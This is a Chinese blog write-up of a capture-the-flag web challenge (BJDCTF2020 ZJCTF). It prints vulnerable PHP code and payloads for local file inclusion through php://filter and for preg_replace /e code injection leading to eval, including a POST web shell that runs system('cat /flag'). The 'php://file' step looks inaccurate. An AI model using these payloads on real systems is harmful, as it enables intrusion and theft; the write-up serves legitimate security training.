BUU-WEB-[BJDCTF2020]ZJCTF，不过如此

最新推荐文章于 2022-02-08 15:17:08 发布

TzZzEZ-web

最新推荐文章于 2022-02-08 15:17:08 发布

阅读量130

点赞数

分类专栏： BUU-WEB

本文链接：https://blog.csdn.net/qq_24033605/article/details/116805236

版权

BUU-WEB 专栏收录该内容

59 篇文章 2 订阅

订阅专栏

[BJDCTF2020]ZJCTF，不过如此

php代码审计。

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

绕过第一个if：
1.以get方式提交两个参数，text和file。
2.text的主要内容是I have a dream。
3.file中不能包含flag。
直接构建payload：

text=I have a dream&text=next.php

无法传入。
于是通过php://file传入text的内容。
再将next.php的内容以php://filter的方式读取。

text=php://file&file=php://filter/read/convert.base64-encode/resource=next.php

在这里插入图片描述
成功读取next.php的base64的源码密文。

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

绕过preg_replace函数
构建payload：

/next.php?\S*=${getflag()}&cmd=show_source("/flag");

在这里插入图片描述
也可以通过POST传入。

next.php?\S*=${eval($_POST[shell])}

再以POST方式提交执行命令：

#POST
shell=system("cat /flag");

在这里插入图片描述

TzZzEZ-web

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
BUU-WEB-[BJDCTF2020]ZJCTF，不过如此

[BJDCTF2020]ZJCTF，不过如此php代码审计。<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1&g
复制链接

扫一扫

专栏目录